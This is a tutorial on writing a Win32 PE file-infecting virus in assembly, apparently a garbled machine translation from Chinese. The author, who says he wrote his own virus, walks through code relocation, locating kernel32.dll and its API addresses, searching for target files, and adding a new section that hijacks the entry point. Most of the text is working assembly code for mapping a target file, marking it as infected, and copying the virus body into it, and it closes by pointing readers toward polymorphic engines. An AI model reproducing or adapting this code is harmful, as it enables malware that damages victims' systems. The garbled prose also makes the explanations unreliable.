聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽 聽聽But now I have learned to find that this technology is actually hidden in many mystery, including many technologies, and unskindled studies cannot reach the realm of "cattle". Nowadays, this article is now, it is quite practical, you can let you take a lot less detours (sometimes a mistake is enough for a few hours). However, some basic knowledge can only be understood. If you have a day's knowledge, you will be your regret if you don't learn a virus. In addition, since it is written to the association member, there is no more "professional", and it will be more described.
Before you see, you should know that this is only a article that can be introduced. If you have already, you will not have to look. It is best to prepare a PE table next to it. Writing virus programs can be written in many languages such as C, compilation, and even some people can use DEPHI to be written. But it is best for writing a virus program or a compilation language. Assembly language, flexible, fast, and small size can play a virus program to the extreme, usually a program is written to only a few thousand bytes contain all functions. Generally, a virus has the following functions:
One code relocation
Second, find the required API address
Search file, catalog
Four infection documents
Five destroying the system or document (casual you)
One, two functions are necessary, five functions are optional. The function of a virus program infection file is its core and is an important criterion for measuring its quality.
(1) Relocation of the code
A variable or function is actually a memory address. After compiling, the instructions in the program will access them by the memory address of the variable or function, and this address is an absolute address. If you insert the code to anywhere, you can't find it through the address generated when you compile, because they have already moved. However, when you take this question when you write a program, you can start at the code, put a few lines of code acquisition, after the variable and function as an offset address, explicitly plus this base address to be smooth Found, this is relocation. Just like this code.
Call getBaseAddress
GetBaseAddress: POP EBX
Sub EBX, Offset getBaseAddress
MOV EAX, DWORD PTR [EBX VAR1]
If you use a macro assembly language to write a virus, try to use EBX to do the base address pointer, do not use EBP, because EBP changes when calling a function that is called with parameters.
(2) I have obtained the required API address.
A WIN32 program file, the API function address called, is in the data structure that is filled into the program file into the program file. The virus is not allowed to be a disabled. Because you did not get into the data structure information of these descriptions of data storage position when you insert the virus's code into the target program. After being inserted into other target procedures, it became a disabled child with only code: (So as a disabled child, you should self-reliance. Search yourself to find the API address you need. The target file contains what we need, we need yourself Looking. The target program file is still a Win32 program. It contains kernel32.dll in its address space. If we find it, we can find any other stuff. The first step is to search for the base address of kernel32.dll. Of course, the entire address space has 4GB, the user process space available for the search is 2GB. Search in 2GB, it is too scary. You can't make users drink tea when you perform infected target procedures? Or fight Landlord? There are two techniques to introduce you to you.
After the program is loaded, the loader will call the location of the first instruction of the program's main thread. The instruction it use is called, that is, your program has not been executed yet, there is a return address in the stack area. This return address points to the loader, and the loader is included in kernel32.dll, let's I can find the base location of kernel32.dll to find it. Of course, it is not a one byte of a byte of a person to find, but a page of a page. Because Win32, the start position of the code or data is always aligned in the page unit (4KB under Windows Platform). KERNEL32.DLL is a PE file, we look at the method of comparing the PE file DOS signing flag and PE signature flag. There is also a way to find the SHE technology. This is the best way, the previous method is unstable because the stack is a dynamic reason, generally only puts the code block for the acquisition address in the most, this method is completely unrelated to the stack, where to do it without Error, if your virus needs to use some technical skills such as remote threads, it is best to use this method. SHE structure, the first member points to the next SEH structure, if it is the last one, its value is 0FFFFFFFH. The second member points to an exception handler, and if it is the last SHE structure and is not specified, the default is the setunhandLedeExceptionFilter function address. A dialog box will pop up when an exception triggered this function and ask you no error. The blue screen is displayed under 98. This function is included in kernel32.dll, as long as it gets its address, you can find the base location of kernel32.dll. When I say she, I will not forget the TEB. Teb is the thread-related data structure allocated when creating a thread. She is only the first data structure. It also contains many other important things, TEB points to the FS segment selector, is interested in books, this will not say more. Next, look at how to find the SetunHnderExceptionFilter function address. First, according to the value of the "next" SHE structure, the address of the SHE processing function is removed at this time, it is the address of the setunhandleredeceptionFilter function. You can find kernel32.dll to find it in units.
After getting the base site of Kernel32.dll, it is positioned to its export table, finding the getProcAddress address and then uses GetProcAddress to find any other functions. When searching for the API, you should pay attention to the name of the API. The actual export name of the API's name is likely not the name when you call, and there are two version of the ANSI version and Unicode version. For example, CreateWindowexa, and the Unicode version of the function name with a W suffix, such as CreateWindowExw. However, considering troubleshooting, the existing compilers don't let you write a suffix, just when compiling, according to your program is an automatic change name of the UNICODE version. The API function after Win2K is a Unicode version. If the ANSI version of the function is called, the system simply converts the string in the function into the unicode string, and then call the Unicode version of the API. Unicode is a development direction, and everyone should develop it habits instead of ANSI.
(3) Search for documents, catalog
It is mainly implemented with FindfirstFile, FindNextFile, FindClose. These three functions. It is worth noting that all the files and directories of the directory where the program file is located when searching for strings. GetCurrentDirectory achieved the current directory of the system. The latter will change with the user's operation, the former will only change as the location of the target program file changes. When searching for directory and files that need to be infected, you should focus on searching the Windows Installation Directory (getSystemDirectory), the current directory (GetCurrentDirectory), of course, the current directory is not let go, for example, you infect QQ, QQ directory There are so many procedures that are often used, such as coral plugs, mailboxes, etc. are all your dishes. My favorite place or the catalog of various processes in the system, those most commonly used, my Suining No.1 virus is to do this by code insertion, very troublesome, and very unstable. Often inexplicably makes the plug-in process ends in insertion, although you can avoid it, but still there is not much effect. I am now conceiveing my next virus. At that time, I will use PEB to enumerate the directory where the various processes are, no longer inserting, will make the virus stable, I am in Suining No. 1 The process uses the Toolhelp series function to make the virus in Windows 98. (4) Infection documents
The so-called infection is to insert the code of the virus program into the target program, and then let the target program execute the code of the virus program. As for where the code is inserted into the target program, how to make the target program execute the inserted virus code, what time is infected with what files are the core of infection. First discuss where the virus code is inserted into where the target program is taken effect.
Executable files under the Windows platform are PE format, this format file, you can see it as two parts. The first part is a data structure describing various types of data storage locations, and the second part is various data, such as resources, code, data, and more. Therefore, if you want to correct the code to the target program file, you want to read and modify the data structure that describes the location of the various data storage locations in the target program file. Let's calculate the location of our code insertion, here we tell a simple insertion method, achieved by adding a new section in the file.
Push EAX
Push file_attribute_normal
Push EAX
Call DWORD PTR [EBX SETFILEATTRIBUTES1]
POP EAX
Push null
Push file_attribute_normal
Push Open_EXISTING
Push null
PUSH 0
Push generic_read or generic_write
Push EAX
Call DWORD PTR [EBX CREATEFILE1]
INC EAX
JZ @ Error1
Dec EAX
MOV DWORD PTR [EBX HFILE], EAX
I don't have more to say it, it is open the file! File name pointer in eax
Push null
Push DWORD PTR [EBX HFILE]
Call Dword PTR [EBX GetFileSize1]
MOV DWORD PTR [EBX DWFILESIZE], EAX
Push null
PUSH 0
PUSH 0
Push Page_Readwrite
Push null
Push DWORD PTR [EBX HFILE]
Call DWORD PTR [EBX CREATEFILEMAPPING1] OR EAX, EAX
JZ @ Error1
MOV DWORD PTR [EBX HMAP], EAX
PUSH 0
PUSH 0
PUSH 0
Push file_map_read or file_map_write
Push DWORD PTR [EBX HMAP]
Call DWORD PTR [EBX MapViewOffile1]
OR EAX, EAX
JZ @ Error1
MOV DWORD PTR [EBX PMAP], EAX
Mov ESI, EAX
CMP Word PTR [ESI], 'ZM'
JNZ @ Error1
Add ESI, DWORD PTR [ESI 3CH]
CMP Word PTR [ESI], 'EP'
JNZ @ Error1
CMP DWORD PTR [ESI 4CH], '1.ns'
JZ @ Error1
These steps are to map files, and then determine whether the file is not a PE format file, is it already infected? If these two conditions have a satisfaction, it means that there is no need to infect it, jump to @ Error1.
MOV EAX, DWORD PTR [EBX DWFILESIZE]
Add Eax, Virus_END-VIRUS_START
MOV ECX, DWORD PTR [ESI 3CH]
Call align1
Just achieved the size of the file, now add it and the volume of the virus, and then log align, pay attention to the file alignment is necessary. Align1 is a pair of collaborative procedures, and the alignment value is placed in Eax, and the alignment is placed in ECX.
When I said this, I started to watch the tutorial, this article said that the alignment method has a mistake, I didn't know, once I wasted me 3 times for this mistake, I was so confident. This error is to align, the so-called alignment is the multiple of a number (unlined) to another number (alignment factor) he talks about the alignment method, he said, first remove the number of unsciled numbers , Then subtract the remainder with alignment factor, and then add this number of subtracted numbers. I have made a few values, and most files can also be infected correctly, but there are several files that have a problem. Later, it was found to be the problem of file alignment, so I changed a more logically easier to think about, and an unsigned number is always a multiple of factors. We first identify that the number of unsigned is a few times that is aligned. Using unsigned number to alignment, if there is any remainder, there is no alignment, it is double, and the merchants will be multiplied by alignment, so that the alignment value is obtained. If the alignment itself is larger than the original number, then there is still the remainder, plus one by alignment factor, is double the factor, so this method is both simple and logic. This is the method. But I am not very blame the Billy Belceb because he is 16 years old when he wrote an electronic tutorial. The 16-year-old article is already difficult to have a deep article. Admire ~~~.
MOV DWORD PTR [EBX DWFILESIZE], EAX
Push DWORD PTR [EBX PMAP]
Call DWORD PTR [EBX UnmapViewOffile1]
Push DWORD PTR [EBX HMAP]
Call DWORD PTR [EBX CloseHandle1]
PUSH 0
Push DWORD PTR [EBX DWFILESIZE]
PUSH 0
Push Page_Readwrite
PUSH 0
Push DWORD PTR [EBX HFILE]
Call DWORD PTR [EBX CREATEFILEMAPPING1]
OR EAX, EAX
JZ @ Error1
MOV DWORD PTR [EBX HMAP], EAX
PUSH 0
PUSH 0
PUSH 0
Push file_map_read or file_map_write
Push DWORD PTR [EBX HMAP]
Call DWORD PTR [EBX MapViewOffile1]
OR EAX, EAX
JZ @ Error1
MOV DWORD PTR [EBX PMAP], EAX
Refign a file with a file based on the new file, a file. At this time, the size of the file is also increased accordingly.
Mov ESI, EAX
Add ESI, DWORD PTR [ESI 3CH]
The following two lines of code can ensure that the infection program does not pop up when running in XP, and does not pop up an error dialog box! ! When I didn't know, I have written a low level of virus that can infect a lot of documents. I thought that the virus infection was like this, but one day, I found that the record after the infection of the virus is unable to use, always prompt "Illegal Win32 Program" I re-written the virus once, change the code, but still no effect. I am very disappointed, watch the article online. Inadvertently saw an article of Lao Luo, some of which he specially wrote a comment. I am grateful to someone who helped him in technology. It should be 0. It seems that he has also encountered this problem. I added his code to my program, and the miracle found it, it can be infected. I then checked a lot of information and didn't find this structure. I only know that it is the 11th member of Image_Data_Directory.
PUSH 0
POP [ESI Image_NT_HEADERS.OPTIONALHEADER.DATADIRECTORY (88)]]
MOV ECX, DWORD PTR [ESI 74H]
SHL ECX, 3
XOR EDX, EDX
Lea EDI, [ECX ESI 78H]
Movzx Eax, Word PTR [ESI 6H]
Imul Eax, Eax, 28h
Add Edi, EAX; positioning to the last section
; Start filled new section structure
This code is very simple, it is positioned to the end of the final section. You may be able to use SizeOfheader plus NumberOfSecion * to size 28h but I still compare the methods I use now. The reason is that there is a much better compatibility, and my method is to get the number of image_data_directory multiplied the size of its size plus other heads. Plus the number of sessions of the section of the section 28h. There are many viruses to use this method. why? I think Windows will expand the number of IMAGE_DATA_DIRECTORY members in the future. So dynamic achieved it better. Ok, now EDI has pointed to the end of the section, now the new additional site: (I will fill in our section of our section.
MOV DWORD PTR [EDI], '1ns'
MOV DWORD PTR [EDI 8], Virus_end-Virus_Start
The name SN1 of the festival is filled here (this domain has 8 bytes), and the size value of my virus is given to Virtual Size (some places), this value does not need to be aligned. Speaking of alignment, everyone must know that a concept is that the data section in the memory is aligned, the data files in the file are aligned.
MOV ECX, DWORD PTR [ESI 38H] MOV EAX, DWORD PTR [EDI-28H 0CH]
Add Eax, DWORD PTR [EDI-28H 8h]
MOV ECX, DWORD PTR [ESI 38H]
Invoke align1
MOV DWORD PTR [EDI 0CH], EAX
After getting the section is aligned, the Virtual Address member of the given is assigned the memory address when mounting this section in memory. The method is to get the start address of the previous section plus the unsigned size of the previous section, that is, Virtual Size is aligned, it is possible.
MOV ECX, DWORD PTR [ESI 3CH]
Mov Eax, Virus_END-VIRUS_START
Invoke align1
MOV DWORD PTR [EDI 10H], EAX
Now the sizeofrawdata we should have a value. This domain is the size in the file, you must go through the file alignment, that's good, we get the virus size, the file is aligned.
MOV EAX, DWORD PTR [EDI-28H 10h]
Add Eax, DWORD PTR [EDI-28H 14H]
MOV DWORD PTR [EDI 14H], EAX
There is also a value offset in the file called PointertorawData. This value is calculated by the SizeOfrawData in the previous section plus the PointertorawData of the previous section. why? Your own brain. It is useless to learn if you don't have a brain shell.
MOV DWORD PTR [EDI 24h], 0e00000E0H
This domain is the best understanding, the member name is called characteristics meaning in Chinese. There are several, readable, executable, can be shared, and more important, several attributes are all the few, which can be shared is more embarrassed. Speaking, can share properties can make this section. Data or code refuses to write on write, what is write time, such as 10 instances of notepads are running, Windows assigns 10 different size processes to the same program, Microsoft can be Stupid, he uses a technology called writing when it can save memory. 10 Notepads run at the same time, the process space of 10 notepads is mapped to one identical physical memory. When there is a notepad who wants to write, the data will change all, it will affect the other 9 Notepad, but with the interference of copying techniques when writing, the notepad written to the data is added to the block memory, and the newly assigned physical memory is lost to the process space address written by Notepad, and will The original data is copied to this new memory so that it is written in the new memory when it is written, and I am pleased that I don't affect other processes. If you haven't understood it, look at the "Windows Core Programming" memory management that section. Go back to our infection problem, if your section has a shared property, it means that it refuses to write to copy technology, that is, the notepad of the writing data will affect the other 9 credits, if this is a If the variable is, 10 notepads can affect global or shared variables.
MOV EAX, DWORD PTR [EDI 0CH]
Add Eax, Start-Virus_Start
The above two lines of code are useful to calculate the virus's code entry point, the calculation method is simple, it is the label Start that my virus began to implement the local label Virus_start, you may be a bit not understanding because the virus begins. The place is not my virus to start executing code. My virus began to execute the data in front of the place where the code is implemented. These data is also included in the code segment. That is to say, my virus is only one festival .Text. (Code Festival called .Text) -push dword ptr [ESI 28h]
POP DWORD PTR [EBX Oldip]
Save the target file original code entry point, this is an offset, if you really want to jump back to the original code entry point, you can't only perform AddressOfEnTryPointer (the pointer to the entry point), but also add an imagebase member to jump, otherwise It is equal to suicide your virus. Why? Because addressofentryPointer is an offset, the number is small, and one hop is likely to jump to the 2GB of the system process space, you see Microsoft, you don't. Unless you use she.
Push EAX
POP DWORD PTR [ESI 28H]
The value of the virus that is calculated from the previous step will now add the value of the offset address Virtual Address member of this section, fill in. Why do you want to add two offsets? Because your own ease will not turn around :(
Calculate new SizeOfImage
Mov Eax, Virus_END-VIRUS_START
Add Eax, DWORD PTR [ESI 50h]
MOV ECX, DWORD PTR [ESI 38H]
Invoke align1
MOV DWORD PTR [ESI 50H], EAX
This SizeOfimage member is not very good! This value under Windows2000 is a little bit better than you. Many people have eaten losses in this place, ft. This value means the size of the memory after the entire permeability map. Plus your new size plus the original SizeOfimage is aligned. If you are infected with the file you can't run, let's see if this is wrong.
Inc Word PTR [ESI 6H]
Just added a section, now add the value of NumberOfSecion
Push DWORD PTR [ESI 34H]
POP DWORD PTR [EBX Oldbase]
A memory base address at which the program file is run. Our virus uses relocation and does not use it, but we have to jump back to the original program files to continue to execute, just use it, it has been very clear.
MOV EAX, DWORD PTR [EDI 10h]; obtain file offset
Add Eax, DWORD PTR [EDI 14h]; Plus the file size, huh, huh, the file offset is small, and the last section is, smart, you may have already thought, this is the end of the file, this stuff is left Behind it.
And DWORD PTR [EBX ISINJECT], 0; this value is no matter what I am inserted into a logo variable for other processes.
Push EAX
MOV DWORD PTR [ESI 4CH], '1.ns'
MOV ECX, Virus_END-VIRUS_START
MOV EDI, DWORD PTR [EDI 14H]
Add Edi, DWORD PTR [EBX PMAP]
Lea ESI, [EBX VIRUS_START]
REP MOVSB
The main function of the above code is to write the virus code in accordance with the position points to the PointertorawData of our new section. Push DWORD PTR [EBX PMAP]
Call DWORD PTR [EBX UnmapViewOffile1]
Push DWORD PTR [EBX HMAP]
Call DWORD PTR [EBX CloseHandle1]
Turn off the memory map file, don't understand Win32API.
POP EAX
Push file_begin
PUSH 0
Push EAX
Push DWORD PTR [EBX HFILE]
Call DWORD PTR [EBX SETFILEPOINTER1]
Move the file pointer from the beginning of the file to the end of the new file.
Push DWORD PTR [EBX HFILE]
Call DWORD PTR [EBX STENDOFFILE1]
Set the location of the file pointer to the end position, (actually in the adjustment file size) Why do you do this? Because I started the file size to change the file size into the size of the original file size unsigned influence. However, this size is incorrect, should be the size of the original file size virion alignment, so I called a function to re-change the file at the end of my new section of PointertorawData SizeOfrawData, which is equivalent to the original file size. SizeOfrawData SizeOfrawData is the size behind the virion body, of course, you can mapping the size of the original file size virus body at the beginning, so better, with a few functions. I plan to make a big transformation in my next virus, such garbage code will not appear again.
@ Error1:
Push DWORD PTR [EBX HFILE]
Call DWORD PTR [EBX CloseHandle1]
Close the file, then the file changes smoothly.
Push DWORD PTR [EBX PMAP]
Call DWORD PTR [EBX UnmapViewOffile1]
Push DWORD PTR [EBX HMAP]
Call DWORD PTR [EBX CloseHandle1]
RET
Finally, I said, this article is very rubbish, more like my study notes, haha. Writing this, I have a deep memory, but I hope that you can make less mistakes in the twisted path of studying the virus technology through my spam, because I have been dead, you don't have to die again. . The newcomer is very terrible in writing a virus. Maybe it is fatal, because it is almost not found, and this error is often not the syntax error of the program, you need your analysis, system Fully understanding can quickly locate errors. I have made many mistakes, and there are many mistakes in the "low" mistakes in the overnight process. I wasted a lot of debugging time, ft. In addition, there are not so many high technologies because I am also exploring. Everyone learned the content in this article, you can look at the inlet point fuzzy technique, polymorphic infection engine technology, virtual machine technology. Simple and practical, how to infect files without changing the size of the file size, PEB and TEB structures, code insertion technology. Required by the next school, the higher the requirements of your compilation, you should also learn the knowledge of the assembly, such as Protecting mode, such as MMX, while improving technology.
